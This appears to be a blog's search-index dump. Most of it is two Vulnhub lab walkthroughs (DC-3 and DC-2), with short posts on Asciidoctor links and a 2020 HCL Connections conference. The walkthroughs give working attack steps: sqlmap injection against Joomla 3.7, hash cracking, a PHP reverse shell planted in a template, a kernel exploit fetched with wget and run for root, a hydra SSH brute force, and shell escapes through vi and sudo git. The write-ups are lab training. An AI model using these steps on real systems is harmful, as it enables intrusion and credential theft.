\u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;DuckDuckGo\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; The good thing is, that there is a shortcut for this. You can replace window=_blank with a ^:\n* https://www.duckduckgo.com[^] * https://www.duckduckgo.com[DuckDuckGo^] https://www.duckduckgo.com DuckDuckGo Following html source is generated\n\u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; class=\u0026#34;bare\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;https://www.duckduckgo.com\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;DuckDuckGo\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; You see the result is absolutly the same.\nThis work also with Antora and was implemented with Asciidoctor 1.5.7 .\nThanks to Dan Allen to mention this in the Antora Gitter Chat .\n","excerpt":"\u003cp\u003eI write most of my documentation with \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, so saving some keystrokes is important.\u003c/p\u003e\n\u003cp\u003eYou can add \u003ccode\u003ewindow=_blank\u003c/code\u003e to links in your Asciidoctor source.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/asciidoctor-links/","title":"Asciidoctor open links in new window"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/dnug/","title":"DNUG"},{"body":"This week I attended the DNUG Connections Day 2020 in Munich . First of all I need to thank the organization team which did a really good job (Thanks Andreas , Martti and Lara ). During the short breaks we had great conversations with parts of the HCL Developer team and other attendees.\nUpdate\nI completely forgot to mention Jörg Rafflenbeul ! He was responsible for beer steins, a great glass of quits jar, photos, videos and a ton more. Sorry Joerg and thank you!\nDuring the first session (Connections Roadmap with Danielle Baptiste ) there was a very important announcement and parts of the audience were really surprised. But let’s start with an extended roadmap for 2020 and the final \u0026ldquo;big bang\u0026rdquo; on Version 7.\nDisclaimer: some of the stuff is marked with \u0026ldquo;Subject to change\u0026rdquo;!\nHCL Connections Roadmap 2020 6.5 CR1 — Q1/2020 Mailintegration in CNX Ui\nHCL Wash\nDocs\nCEC\nPlugins\nSo we get the mailintegration back into the Connections UI and more apps will get the new logos.\n6.5 CR2 — Q2/2020 Integration Strategy\nMS Teams\nNew Outlook Integration\nMS Identity platform\nOrient Me enhancements + Print PDF\nDocs CR4\nThat sounds really interesting, integrating Microsoft software into Connections is a huge step in my eyes.\n6.5 CR3 — Q3/2020 Interactive OM calendar\nLeap integration\nSharepoint integration\nOneDrive integration\nSo more integration points for 3rd party.\nV7 — Q4/2020 O365 Integration\nIntuite UX\nRobust mail, calendar and chat integration\nContainerization\nKubernetes annoucement So and now to the big annoucement. V7 will completely run on Kubernetes! There will be application which still need WebSphere, but these will run already in containers on the Kubernetes stack.\nThere are several workshops and article planned to help everybody on the transition from WebSphere to Kubernetes.\nMore sessions Over the day Sandra Bühler presented about the MSP cloud offering of Belsoft, ISW and Prominic. Maria Nordin showed the new Activities+ and Stefan Hessler the new parts Social Sidebar, Touchpoint and Invite of HCL Connections. Andre Hagemeier got several pages of his notebook filled with requests, ideas and wishes of the audience.\nSome interesting tweets during the day:\nhttps://twitter.com/easterlakes/status/1216614868461203462 https://twitter.com/social_baptiste/status/1216690195975852032 https://twitter.com/social_baptiste/status/1216658904693772291 My session on Containers and Kubernetes I’m really happy that HCL will do this move and my session did an introduction on containers, infrastructure as code and automation. We get a real good opportunity to start over with Kubernetes and implement the basics of these technologies from the beginning.\nYou can start learning today and build a Kubernetes cluster for Connections componentpack, so don’t wait until version 7!\nYou find the slide deck here:\nDocker and Kubernetes Basics ","excerpt":"\u003cp\u003eThis week I attended the \u003ca href=\"https://dnug.de/connections-day-2020/\" target=\"_blank\"\u003eDNUG Connections Day 2020 in Munich \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. First of all I need to thank the organization team which did a really good job (Thanks \u003ca href=\"https://twitter.com/easterlakes\" target=\"_blank\"\u003eAndreas \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"https://twitter.com/mgarden\" target=\"_blank\"\u003eMartti \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://twitter.com/Lara39591380\" target=\"_blank\"\u003eLara \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n). During the short breaks we had great conversations with parts of the \u003ca href=\"https://www.hcltechsw.com/wps/portal/hclsw-home\" target=\"_blank\"\u003eHCL \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Developer team and other attendees.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eUpdate\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eI completely forgot to mention \u003ca href=\"https://twitter.com/jrafflen\" target=\"_blank\"\u003eJörg Rafflenbeul \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n! He was responsible for beer steins, a great glass of quits jar, photos, videos and a ton more. Sorry Joerg and thank you!\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/dnug-connections-day-2020/","title":"DNUG Connections Day 2020"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sqlmap/","title":"Sqlmap"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vulnhub/","title":"Vulnhub"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/walkthrough/","title":"Walkthrough"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/walkthrough/","title":"Walkthrough"},{"body":" Link to Vulnhub DC Challenges Original Description\nDC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.\nAs with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.\nLinux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.\nFor beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.\nFor those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).\nIf that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.\nRecon nmap\nroot@kali:~/vulnhub/dc3# nmap -sn 10.128.1.150-200 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST Nmap scan report for DC3VM.stoeps.lab (10.128.1.156) Host is up (0.00095s latency). MAC Address: 00:0C:29:7F:2F:B8 (VMware) root@kali:~/vulnhub/dc3# nmap -A -p- 10.128.1.156 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST Nmap scan report for DC3VM.stoeps.lab (10.128.1.156) Host is up (0.0011s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home MAC Address: 00:0C:29:7F:2F:B8 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 1.12 ms DC3VM.stoeps.lab (10.128.1.156) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds A short check with the browser shows us a Joomla webpage. Let’s check version and possible attacks.\njoomscan\nroot@kali:~/vulnhub/dc3# apt install joomscan root@kali:~/vulnhub/dc3# joomscan -u http://10.128.1.156 ____ _____ _____ __ __ ___ ___ __ _ _ (_ _)( _ )( _ )( \\/ )/ __) / __) /__\\ ( \\( ) .-_)( )(_)( )(_)( ) ( \\__ \\( (__ /(__)\\ ) ( \\____) (_____)(_____)(_/\\/\\_)(___/ \\___)(__)(__)(_)\\_) (1337.today) --=[OWASP JoomScan +---++---==[Version : 0.0.7 +---++---==[Update Date : [2018/09/23] +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo --=[Code name : Self Challenge @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP Processing http://10.128.1.156 ... [+] FireWall Detector [++] Firewall not detected [+] Detecting Joomla Version [++] Joomla 3.7.0 [+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable [+] Checking Directory Listing [++] directory has directory listing : http://10.128.1.156/administrator/components http://10.128.1.156/administrator/modules http://10.128.1.156/administrator/templates http://10.128.1.156/images/banners [+] Checking apache info/status files [++] Readable info/status files are not found [+] admin finder [++] Admin page : http://10.128.1.156/administrator/ [+] Checking robots.txt existing [++] robots.txt is not found [+] Finding common backup files name [++] Backup files are not found [+] Finding common log files name [++] error log is not found [+] Checking sensitive config.php.x file [++] Readable config files are not found Your Report : reports/10.128.1.156/ Not that detailed like with wpscan, but enough infos for now. We know it’s Joomla 3.7.\nsearchsploit\nroot@kali:~/vulnhub/dc3# searchsploit joomla 3.7 ----------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------- ---------------------------------------- Joomla! 3.7 - SQL Injection | exploits/php/remote/44227.php Joomla! 3.7.0 - \u0026#39;com_fields\u0026#39; SQL Injection | exploits/php/webapps/42033.txt The file 42033.txt tells us, that a call is vulnerable for sqlmap.\n42033.txt\n... sqlmap -u \u0026#34;http://localhost/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ --dbs -p list[fullordering] ... Attack Joomla SQLMAP Get databases\nsqlmap -u \u0026#34;http://10.128.1.156/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ -p list[fullordering] --dbs ... available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys ... Get tables\nsqlmap -u \u0026#34;http://10.128.1.156/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ -p list[fullordering] -D joomladb --tables ... Database: joomladb [76 tables] +---------------------+ | #__assets | | ... | | #__usergroups | | #__users | | #__utf8_conversion | | #__viewlevels | +---------------------+ ... the user table Dump table\nsqlmap -u \u0026#34;http://10.128.1.156/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ -p list[fullordering] -D joomladb -T \\#__users --dump ... [14:39:05] [WARNING] unable to retrieve column names for table \u0026#39;#__users\u0026#39; in database \u0026#39;joomladb\u0026#39; [14:39:05] [INFO] fetching entries for table \u0026#39;#__users\u0026#39; in database \u0026#39;joomladb\u0026#39; [14:39:05] [INFO] used SQL query returns 1 entry [14:39:05] [INFO] resumed: \u0026#39;0\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;0\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;freddy@norealaddress.net\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;629\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;2019-04-01 20:27:08\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;admin\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;{\u0026#34;admin_style\u0026#34;:\u0026#34;\u0026#34;,\u0026#34;admin_language\u0026#34;:\u0026#34;\u0026#34;,\u0026#34;language\u0026#34;:\u0026#34;\u0026#34;,\u0026#34;editor\u0026#34;:\u0026#34;\u0026#34;... [14:39:05] [INFO] resumed: \u0026#39;$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;2019-03-23 09:44:38\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;1\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;admin\u0026#39; Database: joomladb Table: #__users [1 entry] Username\nHash\nI put user and hash into a textfile user.\nuser\nadmin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu And run john the ripper on the file.\nroot@kali:~/vulnhub/dc3# john user Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Proceeding with single, rules:Single ... Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist snoopy (admin) 1g 0:00:00:08 DONE 2/3 (2020-01-06 14:03) 0.1226g/s 108.5p/s 108.5c/s 108.5C/s 123456..buster Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed root@kali:~/vulnhub/dc3# john --show user admin:snoopy 1 password hash cracked, 0 left got the password\nJoomla login credentials\nRemote Shell Login to Joomla and go to Extension \u0026gt; Templates. Replace the index.php of the actual template with the code from /usr/share/webshells/php/php-reverse-shell.php. Just change the ip for netcat.\nNow run nc -nlvp 1234 on Kali and open the Joomla page again.\npython3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@DC3VM:/tmp$ uname -a Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux www-data@DC3VM:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial Exploit and root flag I searched for sudoer, sticky bit binaries and other stuff to get root. Finally I decided to use a kernel exploit.\nsearchsploit\nroot@kali:~/vulnhub/dc3# searchsploit ubuntu 16.04 ----------------------------------------------------------------------------------------------------------------------- -------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------- -------------------------------------- Apport 2.x (Ubuntu Desktop 12.10 \u0026lt; 16.04) - Local Code Execution | exploits/linux/local/40937.txt Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c Google Chrome (Fedora 25 / Ubuntu 16.04) - \u0026#39;tracker-extract\u0026#39; / \u0026#39;gnome-video-thumbnailer\u0026#39; + \u0026#39;totem\u0026#39; Drive-By Download | exploits/linux/local/40943.txt LightDM (Ubuntu 16.04/16.10) - \u0026#39;Guest Account\u0026#39; Local Privilege Escalation | exploits/linux/local/41923.txt Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - \u0026#39;ldso_hwcap_64 Sta | exploits/linux_x86-64/local/42275.c Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - \u0026#39;ldso_dynamic Stack Clash\u0026#39; Local Privile | exploits/linux_x86/local/42276.c Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR \u0026amp; SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c Linux Kernel 4.4 (Ubuntu 16.04) - \u0026#39;BPF\u0026#39; Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb Linux Kernel 4.4 (Ubuntu 16.04) - \u0026#39;snd_timer_user_ccallback()\u0026#39; Kernel Pointer Leak | exploits/linux/dos/46529.c Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - \u0026#39;AF_PACKET\u0026#39; Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c Linux Kernel 4.4.0-21 \u0026lt; 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - \u0026#39;AF_PACKET\u0026#39; Race Condition Privilege Escalation | exploits/linux/local/47170.c Linux Kernel 4.4.x (Ubuntu 16.04) - \u0026#39;double-fdput()\u0026#39; bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt Linux Kernel 4.6.2 (Ubuntu 16.04.1) - \u0026#39;IP6T_SO_SET_REPLACE\u0026#39; Local Privilege Escalation | exploits/linux/local/40489.txt This one finally worked DC-3 is a 32 bit machine, so we can save time and leave the 64 bit exploits.\nCompile and run exploit\nwww-data@DC3VM:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip Saving to: \u0026#39;39772.zip\u0026#39; 39772.zip 100%[===================\u0026gt;] 6.86K --.-KB/s in 0.001s 2020-01-07 07:07:00 (11.2 MB/s) - \u0026#39;39772.zip\u0026#39; saved [7025/7025] www-data@DC3VM:/tmp$ unzip 39772.zip www-data@DC3VM:/tmp$ cd 39772 www-data@DC3VM:/tmp/39772$ ls crasher.tar exploit.tar www-data@DC3VM:/tmp/39772$ tar -xvf exploit.tar www-data@DC3VM:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput.c hello.c suidhelper.c www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ sh compile.sh doubleput.c: In function \u0026#39;make_setuid\u0026#39;: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)\u0026#34;\u0026#34; ^ www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you\u0026#39;ll have a root shell in \u0026lt;=60 seconds. suid file detected, launching rootshell... we have root privs now... root@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root cd /root root@DC3VM:/root# ls ls the-flag.txt Compile throws two warnings, but the exploit works The flag root@DC3VM:/root# cat the-flag.txt cat the-flag.txt __ __ _ _ ____ _ _ _ _ \\ \\ / /__| | | | _ \\ ___ _ __ ___| | | | | \\ \\ /\\ / / _ \\ | | | | | |/ _ \\| \u0026#39;_ \\ / _ \\ | | | | \\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_| \\_/\\_/ \\___|_|_| |____/ \\___/|_| |_|\\___(_|_|_|_) Congratulations are in order for completing DC-3VM. :-) I hope you\u0026#39;ve enjoyed this challenge as much as I enjoyed making it. If there are any ways that I can improve these little challenges, please let me know. As per usual, comments and complaints can be sent via Twitter to @DCAU7 Have a great day!!!! Final thoughts This time we had to use sqlmap for the first steps. First time without additional flags like in DC-1 and DC-2.\nThanks to @DCAU7 ! Seeing forward to the other machines in the DC Series ","excerpt":"\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://www.vulnhub.com/entry/dc-3,312/\" target=\"_blank\"\u003eLink to Vulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.five86.com/\" target=\"_blank\"\u003eDC Challenges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOriginal Description\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/20200107-walkthrough-dc3/","title":"Walkthrough: Vulnhub - DC: 3"},{"body":" Link to Vulnhub DC Challenges Original Description\nMuch like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\nAs with the original DC-1, it’s designed with beginners in mind.\nLinux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.\nJust like with DC-1, there are five flags including the final flag.\nAnd again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.\nIn short, the only flag that really counts, is the final flag.\nFor beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.\nI haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.\nTechnical Information\nDC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.\nWhile I haven’t tested it within a VMware environment, it should also work.\nIt is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.\nInstallation is simple - download it, unzip it, and then import it into VirtualBox and away you go.\nPlease note that you will need to set the hosts file on your pentesting device to something like:\n/etc/hosts\n192.168.0.145 dc-2 Obviously, replace 192.168.0.145 with the actual IP address of DC-2. It will make life a whole lot simpler (and a certain CMS may not work without it).\nIf you’re not sure how to do this, instructions are here.\nRecon Find IP\nnmap -sn 10.128.1.150-200 Changed dhcp range Create /etc/hosts entry /etc/hosts\n10.128.1.155 dc-2 Find open ports root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST Nmap scan report for dc-2 (10.128.1.155) Host is up (0.0011s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 \u0026amp;#8211; Just another WordPress site |_https-redirect: ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 00:0C:29:9D:5E:27 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.11 ms dc-2 (10.128.1.155) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds Wordpress this time Wordpress wpscan root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 _______________________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ® \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | \u0026#39;_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.5 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]y [i] Updating the Database ... [i] Update completed. [+] URL: http://dc-2/ [+] Started: Sun Jan 5 10:31:52 2020 Interesting Finding(s): [+] http://dc-2/ | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, \u0026lt;generator\u0026gt;https://wordpress.org/?v=4.7.10\u0026lt;/generator\u0026gt; | - http://dc-2/index.php/comments/feed/, \u0026lt;generator\u0026gt;https://wordpress.org/?v=4.7.10\u0026lt;/generator\u0026gt; | | [!] 21 vulnerabilities identified: | ... Wordpress Version\n21 known vulnerabilities\nEnumerate Users root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 \u0026lt;===========================================================================================\u0026gt; (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100\u0026amp;page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100\u0026amp;page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) Ok, so we found three users:\nadmin\njerry\ntom\nOpening the page gave us Flag 1 . So next goal is login to wordpress.\nWe got the hint to be cewl! That’s a tool to generate passwords out of the text of webpages.\nGenerate wordlist root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2 Find matching passwords root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U \u0026#39;admin,tom,jerry\u0026#39; [i] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient So login with one of the two users and check Pages \u0026gt; Flag 2 and you will find the next flag .\nSSH Check if one of the Wordpress passwords are working on the SSH port (see nmap).\nroot@kali:~/vulnhub/dc2# cat users admin tom jerry root@kali:~/vulnhub/dc2# cat success_pw parturient adipiscing root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh [DATA] attacking ssh://10.128.1.155:7744/ [7744][ssh] host: 10.128.1.155 login: tom password: parturient Now try ssh with user tom\nroot@kali:~/vulnhub/dc2# man ssh root@kali:~/vulnhub/dc2# ssh tom@10.128.1.155 -p 7744 The authenticity of host \u0026#39;[10.128.1.155]:7744 ([10.128.1.155]:7744)\u0026#39; can\u0026#39;t be established. ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU. Are you sure you want to continue connecting (yes/no/[fingerprint])? ye Please type \u0026#39;yes\u0026#39;, \u0026#39;no\u0026#39; or the fingerprint: yes Warning: Permanently added \u0026#39;[10.128.1.155]:7744\u0026#39; (ECDSA) to the list of known hosts. tom@10.128.1.155\u0026#39;s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found tom@DC-2:~$ ls usr/bin less ls scp vi tom@DC-2:~$ less flag3.txt Escape rbash We have a very limit shell (rbash) and ~/usr/bin only shows less, ls, scp and vi, but with vi or less we can read flag3.txt .\nRun external command in vi vi can run external commands, so I tried running :set shell=/bin/bash and :! /bin/bash from within vi. I got a better shell.\nSHELL and PATH\nexport PATH=/bin:/usr/bin:$PATH export SHELL=/bin/bash There is no need to su into the jerry useraccount to read flag4, but you need it to get to the last flag. Flag4 is world readable in his home.\nJerry wasn’t allowed to login with ssh, but it works on the console:\ntom@DC-2:/$ su jerry Password: jerry@DC-2:/$ sudo -l User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git Use the password found with wpscan here I had some headaches how to get git to open a root-shell.\nRoot Shell with git git help add for example opens the man page of git add. Default program to open the man page is less here. less can - like vi before - run external commands. So ! /bin/bash within less runs a new bash. Jerry is allowed to run git with sudo. So that’s the trick to get the final flag.\njerry@DC-2:/$ sudo git help add root@DC-2:/# cd root@DC-2:~# ls final-flag.txt root@DC-2:~# cat /root/final-flag.txt So we got the Final Flag .\nFlags Flag 1 Found directly as Wordpress Post:\nYour usual wordlists 